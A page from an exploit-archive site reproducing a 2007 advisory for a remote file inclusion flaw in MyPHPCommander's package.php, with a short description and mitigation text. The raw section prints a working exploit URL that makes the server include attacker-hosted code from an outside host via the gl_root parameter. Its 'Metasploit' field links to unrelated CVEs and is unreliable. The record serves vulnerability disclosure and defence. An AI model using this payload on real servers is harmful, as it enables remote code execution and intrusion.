header-logo
Suggest Exploit
vendor:
MyPHPCommander
by:
Cold z3ro
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: MyPHPCommander
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: CVE not mentioned
CPE: Not mentioned
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23499/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-3172/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2020-25686/https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=3https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2
Other Scripts:
Platforms Tested: Not mentioned
2007

MyPHPCommander Remote Code Execution

The vulnerability exists in the package.php file of MyPHPCommander. It is caused by the insecure usage of the gl_root parameter, which can be exploited to execute arbitrary PHP code remotely. An attacker can inject a malicious command through the gl_root parameter, leading to remote code execution on the server.

Mitigation:

The vulnerability can be mitigated by updating to a patched version of MyPHPCommander or by removing the vulnerable package.php file. It is recommended to regularly update the software to prevent such vulnerabilities.
Source

Exploit-DB raw data:

######################################################
#
#script : http://sourceforge.net/projects/myphpcommander
#
######################################################
#
#file :  package.php
#
######################################################
#
#vuln : require_once $gl_root.'system/lib/xml2.php';
#
######################################################
#
#Contact : Cold z3ro , C.o.1.d.0@hotmail.com
#
######################################################
#
#Exploit:
http://site.0/myphpcommander_path/system/lib/package.php?gl_root=http://www.4azhar.com/soft.txt?cmd
#
######################################################

======================================================

----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf
KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell| |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY| |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa| | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| |
020 | | abdulla00 " alz3eem" | | The_Viper | All i know

Big Thx For : www.4azhar.com , Viva My HomeLand Palestine .

# milw0rm.com [2007-01-26]

Navigation

Suggest Exploit

Services By CQR